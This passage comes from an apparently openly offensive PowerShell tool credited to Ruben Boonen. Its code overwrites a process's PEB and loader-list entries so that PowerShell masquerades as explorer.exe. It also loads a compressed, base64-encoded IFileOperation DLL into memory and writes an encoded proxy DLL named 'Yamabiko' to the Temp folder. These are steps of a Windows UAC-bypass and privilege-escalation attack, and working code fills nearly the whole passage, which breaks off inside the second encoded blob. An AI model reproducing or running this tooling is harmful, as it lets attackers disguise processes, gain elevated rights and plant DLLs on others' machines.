($x32Architecture) {\r\n    \t\t# Offset to &Peb->ProcessParameters\r\n    \t\t$PROCESS_PARAMETERS = $PEBFlags.ProcessParameters32.ToInt64()\r\n    \t\t# x86 UNICODE_STRING struct's --> Size 8-bytes = (UInt16*2)+IntPtr\r\n    \t\t[UInt32]$StructSize = 8\r\n    \t\t$ImagePathName = $PROCESS_PARAMETERS + 0x38\r\n    \t\t$CommandLine = $PROCESS_PARAMETERS + 0x40\r\n    \t} else {\r\n    \t\t# Offset to &Peb->ProcessParameters\r\n    \t\t$PROCESS_PARAMETERS = $PEBFlags.ProcessParameters64.ToInt64()\r\n    \t\t# x64 UNICODE_STRING struct's --> Size 16-bytes = (UInt16*2)+IntPtr\r\n    \t\t[UInt32]$StructSize = 16\r\n    \t\t$ImagePathName = $PROCESS_PARAMETERS + 0x60\r\n    \t\t$CommandLine = $PROCESS_PARAMETERS + 0x70\r\n    \t}\r\n    \r\n    \t# Overwrite PEB struct\r\n    \t# Can easily be extended to other UNICODE_STRING structs in _RTL_USER_PROCESS_PARAMETERS(/or in general)\r\n    \t$ImagePathNamePtr = New-Object System.Intptr -ArgumentList $ImagePathName\r\n    \t$CommandLinePtr = New-Object System.Intptr -ArgumentList $CommandLine\r\n    \tif ($x32Architecture) {\r\n    \t\techo \"[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x$(\"{0:X8}\" -f $ImagePathName)\"\r\n    \t\techo \"[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x$(\"{0:X8}\" -f $CommandLine)\"\r\n    \t} else {\r\n    \t\techo \"[>] Overwriting &Peb->ProcessParameters.ImagePathName: 0x$(\"{0:X16}\" -f $ImagePathName)\"\r\n    \t\techo \"[>] Overwriting &Peb->ProcessParameters.CommandLine: 0x$(\"{0:X16}\" -f $CommandLine)\"\r\n    \t}\r\n    \tEmit-UNICODE_STRING -hProcess $ProcHandle -lpBaseAddress $ImagePathNamePtr -dwSize $StructSize -data $BinPath\r\n    \tEmit-UNICODE_STRING -hProcess $ProcHandle -lpBaseAddress $CommandLinePtr -dwSize $StructSize -data $BinPath\r\n    \r\n    \t# &Peb->Ldr\r\n    \t$_PEB_LDR_DATA = [Activator]::CreateInstance($PEB_LDR_DATA)\r\n    \t$_PEB_LDR_DATA = $_PEB_LDR_DATA.GetType()\r\n    \tif ($x32Architecture) {\r\n    \t\t$BufferOffset = $PEBFlags.Ldr32.ToInt64()\r\n    \t} else {\r\n    \t\t$BufferOffset = $PEBFlags.Ldr64.ToInt64()\r\n    \t}\r\n    \t$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset\r\n    \t$LDRFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB_LDR_DATA)\r\n    \r\n    \t# &Peb->Ldr->InLoadOrderModuleList->Flink\r\n    \t$_LDR_DATA_TABLE_ENTRY = [Activator]::CreateInstance($LDR_DATA_TABLE_ENTRY)\r\n    \t$_LDR_DATA_TABLE_ENTRY = $_LDR_DATA_TABLE_ENTRY.GetType()\r\n    \t$BufferOffset = $LDRFlags.InLoadOrderModuleList.Flink.ToInt64()\r\n    \t$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset\r\n    \r\n    \t# Traverse doubly linked list\r\n    \t# &Peb->Ldr->InLoadOrderModuleList->InLoadOrderLinks->Flink\r\n    \t# This is probably overkill, powershell.exe should always be the first entry for InLoadOrderLinks\r\n    \techo \"[?] Traversing &Peb->Ldr->InLoadOrderModuleList doubly linked list\"\r\n    \twhile ($ListIndex -ne $LDRFlags.InLoadOrderModuleList.Blink) {\r\n    \t\t$LDREntry = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_LDR_DATA_TABLE_ENTRY)\r\n    \t\tif ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($LDREntry.FullDllName.Buffer) -like \"*powershell.exe*\") {\r\n    \t\t\tif ($x32Architecture) {\r\n    \t\t\t\t# x86 UNICODE_STRING struct's --> Size 8-bytes = (UInt16*2)+IntPtr\r\n    \t\t\t\t[UInt32]$StructSize = 8\r\n    \t\t\t\t$FullDllName = $BufferOffset + 0x24\r\n    \t\t\t\t$BaseDllName = $BufferOffset + 0x2C\r\n    \t\t\t} else {\r\n    \t\t\t\t# x64 UNICODE_STRING struct's --> Size 16-bytes = (UInt16*2)+IntPtr\r\n    \t\t\t\t[UInt32]$StructSize = 16\r\n    \t\t\t\t$FullDllName = $BufferOffset + 0x48\r\n    \t\t\t\t$BaseDllName = $BufferOffset + 0x58\r\n    \t\t\t}\r\n    \t\t\t# Overwrite _LDR_DATA_TABLE_ENTRY struct\r\n    \t\t\t# Can easily be extended to other UNICODE_STRING structs in _LDR_DATA_TABLE_ENTRY(/or in general)\r\n    \t\t\t$FullDllNamePtr = New-Object System.Intptr -ArgumentList $FullDllName\r\n    \t\t\t$BaseDllNamePtr = New-Object System.Intptr -ArgumentList $BaseDllName\r\n    \t\t\tif ($x32Architecture) {\r\n    \t\t\t\techo \"[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x$(\"{0:X8}\" -f $FullDllName)\"\r\n    \t\t\t\techo \"[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x$(\"{0:X8}\" -f $BaseDllName)\"\r\n    \t\t\t} else {\r\n    \t\t\t\techo \"[>] Overwriting _LDR_DATA_TABLE_ENTRY.FullDllName: 0x$(\"{0:X16}\" -f $FullDllName)\"\r\n    \t\t\t\techo \"[>] Overwriting _LDR_DATA_TABLE_ENTRY.BaseDllName: 0x$(\"{0:X16}\" -f $BaseDllName)\"\r\n    \t\t\t}\r\n    \t\t\tEmit-UNICODE_STRING -hProcess $ProcHandle -lpBaseAddress $FullDllNamePtr -dwSize $StructSize -data $BinPath\r\n    \t\t\tEmit-UNICODE_STRING -hProcess $ProcHandle -lpBaseAddress $BaseDllNamePtr -dwSize $StructSize -data $BinPath\r\n    \t\t}\r\n    \t\t$ListIndex = $BufferOffset = $LDREntry.InLoadOrderLinks.Flink.ToInt64()\r\n    \t\t$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset\r\n    \t}\r\n    \r\n    \t# Release ownership of PEB\r\n    \tif ($x32Architecture) {\r\n    \t\t$NtDll::RtlLeaveCriticalSection($PEBFlags.FastPebLock32)\r\n    \t} else {\r\n    \t\t$NtDll::RtlLeaveCriticalSection($PEBFlags.FastPebLock64)\r\n    \t} echo \"[!] RtlLeaveCriticalSection --> &Peb->FastPebLock`n\"\r\n    \r\n        # Sanity check just in case!\r\n        $ProcStatus = Get-WmiObject Win32_Process -Filter \"ProcessId = '$PID'\"\r\n        if ($ProcStatus.CommandLine -ne \"C:\\Windows\\explorer.exe\") {\r\n            Masquerade-PEB -BinPath C:\\Windows\\explorer.exe |Out-Null\r\n        }\r\n    }\r\n    \r\n    #---------------\r\n    # Initialize IFileOperation COM Object\r\n    #---------------\r\n    function Invoke-IFileOperation {\r\n    <#\r\n    .SYNOPSIS\r\n        Bootstrap function to expose an IFileOperation COM interface to powershell (script-scope).\r\n    \r\n    .DESCRIPTION\r\n        Author: Ruben Boonen (@FuzzySec)\r\n        License: BSD 3-Clause\r\n        Required Dependencies: None\r\n        Optional Dependencies: None\r\n    \r\n    .EXAMPLE\r\n        C:\\PS> Invoke-IFileOperation\r\n        C:\\PS> $IFileOperation.CopyItem(\"C:\\Some\\Dir\\a.txt\", \"C:\\Some\\Other\\Dir\\\", \"b.txt\")\r\n        C:\\PS> $IFileOperation.PerformOperations()\r\n    #>\r\n    \r\n        # Compressed Dll which wraps the IFileOperation COM\r\n        # Compression --> http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html\r\n        $EncodedCompressedFile = @'\r\n        7Vt7fFx1lT/3kZnMJJk8GkoLAaZNS9PYhLzatFC0k8ykGTIvZiZ9YCXcmblJhk7mjvdO2oZSTBVRP4ACgqLAQl1YEFhhPwsfkccuAlbWFUHRBS0qiuKyvlBXF1Fkzzn3zp2ZJDzWP/y4n483ud/fOed3fud3fud3fr/7yE34nCtAAgAZz9dfB7gPzGMbvPUxj6fnlPs9cI/riVX3CaEnViWns4a3oGtTujLjTSv5vFb0plSvPpv3ZvNefzThndEyandDg3uNZSMWAAgJErT8/Ns7S3afh9XeOqEHAH/B    Ycry    EQQvnucx28S0aPoNUC7hJlNOhwTbPkiq9Fsu7YKPNrQbBdPutdLSg6zH4kch1H0bMbEP9K+2gq1FfrSC7y6qB4pYFrutcfWU/a4wcV63buhpsHxDH3mgfdV62/C3W1dzWtr0lSeGbG1apDe00M1YxCxHuUkNyDgxz3cACG9rkIuPV8WOZgC3dBkaOLGrTseiYLSg5AJTpC1DWmtFKFUeR5WidGg5lp0niwe5/JxZcpMNJ1UwHccjdap4IQn     +dBxJOleLrR01mCidp4pSa4eDKIBlPRLstXwyXcIucA5l8SKcbrljBUqKTqw7NEbCg4ReWby4SVuHBsSDpLrheNGsMFltLdYcCiMlb1huVsjaSrTTcQKN6R3c8Yk9NeAHjl     +z2IGZ5pA6PIhumYs6s51DOxGbOBlrWjWcT8f3Wp0bHE4Nc8z9nGODw2FSnUIbzUsrnHgauHks0AAbtpj0n9VXz5/blwxdZlpV91XZidyqdZN5d4VR8q/JtHXc6pItCTa8la1WbWChqZKd1lUlOw7Y8lZ2auSLTqLZN6cQV4Tj1Dfyb1W3afcs05hpRRukef2OePBsygihUzz  +0Nl2SmxoLiUIpYV2qt3KTNPOc8XW98WIbcSaogu7MU6m9D7fModu83o4BcHw0kLo/JruolWxCpl5XJvyRQQdq4mlxH2KjHS0U6M1JCPrnZh3lO+4bGkvb9YTaEGUL5NIFZPW7ZY6TqUV1+DQp7BK6lhHQlxsvDA6hxJnDQnWiqf9Y19fd0/3xp7BvkGS1EAO8WrUbL8ICVzLG4hOFPVsfsogjQ3oTgHL9vEEXN9u7q/t28eDlJt3Ij      +Aq7N9KKelSusRQ77zXZ85yUV72atCPyw39xtU5QnYjyfGE24xxwPoLfuAarwHS2bOV52VMhFK+1eP2ywdoNceaHDA9xkvdp7R0AjXNpD8TueqegeM1BKuYzzKeBXjHYzfYZ1rnbux7T5GN8sPNU7XOeBMB6FWR/iiTDjqnK5zw+eaPunBHht+JTjgK033YqvfYr8OSNeSzmq28yjjVD1JxhhfcZHkpAaiBxg7XYSH6qnHftZJYo80qkYemzlzTYjH6s5kTkDBFY3H6gIYCRn5JqyhujGL+6aLuDhNJWr   +sYE047AWbsKJ     +zJqAmjIHUHuaZfJbWHumNvkgtzDRwVqp0EEjXzR1Q8OxzbpcXHH/GHh3xEjDYRjMuHvmwjfx/TLNYQfqiNsdBKe6CL8NGPaTfge1iww/g9rHnAwXU/4TCPhXWznBsYOtv86y7/HkiG2s5ItnMH4ikR4JtcqjCcwOrl2PeNPWKeT5RHGWsYHWX6Qe7mW6XGm72T6fKbHmX6JfTif6RaWf53pK80IMH0G08Aefo/pHTzG23h0DrbwqofwnUx3Mi5nHOdWRdY/zL7JHOd1HB/ZjCHjT3lEvUwHGVc0E77GrT7D     Fm5H+Sp4qe5JxKOupxGXOR4Xe+E/6p5B7HceE5vhu/IzogCfkb8vlub3LPGHiO8Hwp8wfbVAeD9jH8tfMGmJ5axzEuMEy3uYvp3pJ5j+OLeaYbyFJTNc+2um383yjzA9yvQBpuvY/nuYXsn6I6ZNxJK3J0svIj4GhH8QCG9l+jXG5xkHWH4xYsxLK    +qSFesadMzqj5lc7X63givpk8y9KKhOB3KP2prEfdXm/ksU4Vmbe1mUILaKORite0WsgQct7ivuV8RaoH2duKvcr4t1ULS4u9xNeDV60OJ66mokD7S2m9xDuKc0w7r2si/NcC5zV8KL7gap2dpjr/Te6DheaoF9XHcYrpIduH9eaWqu6GpYJS2HLzF3VHjSQ3Ul7k7P2oq6eXendLzNfdTdJ51gc/e7z5ROsbmj7u1Su81trjtTWm9z/rqk1GVzN7hTUr/N3eHOShttbnldp7TF5jbUGdJWm/upZ14atrgXh    RdxPwzY3LEq7knmHrfi4qm/RCrVEXe5NAp/bC/P35gVs6M1485rpDK3x7lWCtlco+c6KWxzD9c0QcTmDrqOSFGbu7XhiBSzuQea1kpn29zv3P8gxW1un+eIlLC5q9x3Skmb2+a5V9ppc19xPyDttrldnqPSe2xutO4BacLmLse6tM3d5X5CUm0uhP1N2VxP3bekaZujzJopey13VHCUIXmbowwpc5Qhms1Rhug2Rxmy3      +YoQw7aHGXIYZujDPmgzVGGXGpzlCGX2xxlyJU2Rxlytc1Rhlxnc5QhN9jcsSruySrui/U/kMrc440/l47Y3AuOX1dwv2h4Rfp7mws7X5NuBrqMPuIiPGqjCL+qJ/oTNUQ/UEd3KMccbyYp0wJ8yUESt5N0fuwhyTUufkrEh0IBLmf7Z0tU+6xMtUcaCfs8JH/aTfKnHEtJZHA46Y7uDnlh7cfrqXZxq7K8Bl6rpTumN297+hu0vb1xqbbVdmacpF+pQxaqx1KWyPAxtvxdvo  +7De9PnLCqjjRXuknzwxz/E   +o5VhztexuXlnyfI3wy97LKQxF+uoZQYny6ieQPsSb6iZKcp0SL7IkE9XUkT3lKEq41vfWWvDV1cvYoqnV+/aY6ZbnAcpFGja3+5ABvKQ6kY+blonzwLsoH79vIB+8b5IP3beTDW7b9s/PBuygfTIn3beSDHR9aO9iLbK0gW/4AW/4Fr    +KHeJV9o1EEH3rhQ8tecMG6BoGuv3jVWInohvWITdDLuIXRxxhkPJtxN6OCeBxkmX4v4xcYv8jWvo54Aswx/W2Wz0HA2Q6fgnMbO+AHLGnl+   +yXIN84CL8CvWYrHIGgYwh+Dxc3juCTEd2nHAa6JxCE9mYNJXQf4xIucRyAZoEsXMl2PgUr4ELESccHENfDpai/s/FqRHfzdYixxptwpPVwN2IT3IvYCvcjroB/RWyDx4A2o39DXANfQ+yApxE3wLOIPfBdxAH4IeJm+AniVvgZ4jb02AV+  +B3iKPwBEa  +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    +6478dfw3H/wI=\r\n'@\r\n    \r\n        # Decompress & load assembly\r\n        $DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)\r\n        $UncompressedFileBytes = New-Object Byte[](14336)\r\n        $DeflatedStream.Read($UncompressedFileBytes, 0, 14336) | Out-Null\r\n        [Reflection.Assembly]::Load($UncompressedFileBytes) | Out-Null\r\n    \r\n        # PS C:\\Users\\b33f> $IFileOperation |Get-Member\r\n        # \r\n        #    TypeName: FileOperation.FileOperation\r\n        # \r\n        # Name              MemberType Definition\r\n        # ----              ---------- ----------\r\n        # CopyItem          Method     void CopyItem(string source, string destination, string newName)\r\n        # DeleteItem        Method     void DeleteItem(string source)\r\n        # Dispose           Method     void Dispose(), void IDisposable.Dispose()\r\n        # Equals            Method     bool Equals(System.Object obj)\r\n        # GetHashCode       Method     int GetHashCode()\r\n        # GetType           Method     type GetType()\r\n        # MoveItem          Method     void MoveItem(string source, string destination, string newName)\r\n        # NewItem           Method     void NewItem(string folderName, string name, System.IO.FileAttributes attrs)\r\n        # PerformOperations Method     void PerformOperations()\r\n        # RenameItem        Method     void RenameItem(string source, string newName)\r\n        # ToString          Method     string ToString()\r\n    \r\n        $script:IFileOperation = New-Object FileOperation.FileOperation\r\n    }\r\n    \r\n    #---------------\r\n    # Write proxy dll to disk\r\n    #---------------\r\n    function Emit-Yamabiko {\r\n    <#\r\n    .SYNOPSIS\r\n        Bootstrap function to write x32/x64 Yamabiko to disk. Exposes $DllPath to powershell (script-scope).\r\n    \r\n        Yamabiko: a mountain god, used to describe the phenomenon of a delayed echo in mountains and valleys.\r\n    \r\n    .DESCRIPTION\r\n        Author: Ruben Boonen (@FuzzySec)\r\n        License: BSD 3-Clause\r\n        Required Dependencies: None\r\n        Optional Dependencies: None\r\n    \r\n    .EXAMPLE\r\n        C:\\PS> Emit-Yamabiko\r\n        C:\\PS> $DllPath\r\n        C:\\Users\\b33f\\AppData\\Local\\Temp\\yam1475935850.tmp\r\n    #>\r\n    \r\n        $script:DllPath = $env:Temp + \"\\yam$(Get-Random).tmp\"\r\n    \r\n        $yamabiko32 = @'\r\n        7V0JmBvFlX7jjBPbHDYbYIHsEgH2jg88nsM22NhuaSSNR/ZcHs1hG8PQI7Vm2pa6RXfL9jgkHLYDZjA2IewmQMy1RyBkEwIbh8sxkOWMwxFgl2MTw3Ltt2Rhv5BNSDbx/lUtzUialtTd0pjvy0bwT6urXv3vdXW9qlfVLVfb+r30KSKqBo4cIfoBmR8vlf4cBo7//APH031TD53xg6rWQ2d0D8m6J6mpg5qY8ERERVENz4Dk0VKKR1Y8gY6wJ6FGpdrjjps2M82RWDH30Jz +wL4MPrp1z765/Htw39k4PlTVestcfgzcMhvHB6se3Deb5/+UHx  +qaubpXXJkiJXPt7EzSNRaVU2DZ73WN2b3pDOOqTqeaBJOtpppVTPwh8HDT2fw78j/NI2Bf75rVtbv1lch2zuZF5phFjGP5uEgeLoTRB9eSzSbJe4FJltU4q1Ep7AD5P/CRp2PfjwZU60/tYa01cAxWJU2aJJpdx7FRbVaVDREohtVM4GS2Rdrfrz4v1bTtQilr2FvWmazlZwUVyPmNbFr43ovGSfXVPL6/vQ5Kp/Hekbev/z9JO5m40FvuHdJ8NjpO2ehzWwMrB95enfw7sbXrjrFu/0/qlK/2Thj3e7gh5  kzZO3qubvzyEkzPDTj/mm4y7t33vr7I0cy+QeqqzJJvZ1DHggdOQnta8bOg9N3HIDe8x6fvv37ON4/o5rJ7f14rGhshBfbvZslxnYeNE6fvv/D3TewtJFH5j0X21W//ZFJ0/dXTxv5ELmpDxoPxnZVpaWXcCZjCiRiS06F0ckHLoPWC+c9j2K7Q+OLBT/sxKV0mpZ2hjfOCONj2oOLO5ZbbMw4kvpwZFE1u4iXj6Q+OvJy+MhJUxjt    +SNvX/DosZ/0PSzn07SH6EIgDmwD6vbk5s8inYYBgyRKkEYq/jOQuiEnvZEakNJHMikUhcQW5HTyo4QyYRrCMY7/NqDLqKdaqsM385McldJHpWpx3ApkPpm++zjgdeBE9KknGjQu/zdz0I/j+F4GHqKrMNDMRge8ZC7RIUCeR/Q/wCVnE312PtH1QFMtkbAAnHVEdwMN9UT7geYGoqeApY1E3wOWLiR6EbhyEdHnFhNdDUw+B1zAx8DmczG2AKuWYBwFZi0lugGoPo8oBbwFaMuI5iwn    +jHQvoLoGaBLgG3AUi/0AIt9RPcCZ6OX3AdU+Yk2Aa8CwQDRd4BTMK7tA5Y0Ez0NKCuJTm+BXsAfInoDGFlF1LuaaE0r0cw2oieA9nainwAbO4g+AM7vRHkguAa2AN1dRO8DXw2jHrqJHgbO78E4BiR6iU5CTe8HFq0lugdYvI7oIWDpetgFzDsfQyQwHzf4XeCuCzD+Xkj0NhDrJ/ovQLsIOoCLMO4cBjYNYIjCmHEnsCoKGUDC7T8M9MaIfgasHyR6GYgO4RwIy0TPAas2YqwF/JtwHUB7nOh5YAPG3l8C    +xXcY4xtrRjXfgfsu5joHI3oEaBXhx2Agrb0a2B7CsMaxrS9wMlbiO4DBhAfvAOsGyZ6CejbhjoGhC8QvQL0Ymx7Abjoi0S/Ba74EuIoYNelRMsuQx0DqcuRB1x9BVHPdvjYDqJngf6dqFdg25fRRq7EEXgcmH4V0VrgDuAXQOMuMsfwP1K8spvoM/DNm4EF8M0XgRD88zCwBf55GHgJPvoqfPRS+Oc0+OYIcCJ8807gNPjmCDANvnkTsAL +WQXfjAE/BzbANw8BvfDNJ4C58M2bgE/DN1PAO0AYvvkkUA//fAu4Bf45F755BzATvnkPcBp8cwSYBt+8HqiGb+4E3gNWwzcfAubAN78C/B6Iwj+nwjdvBObBP98ERuCfJ8M3bwO64J+/At6Dj/4nfPRa+Gc9fPNmoB6++SJwHnzzbuBU+ObtwCz45n1AD/yzGr55HXAafPMQEIB/PgHsgX/OgG+OAFPgmzcAJ8I3rwP+AOyCf06Bb24HLoF/ToVvHgTOg28 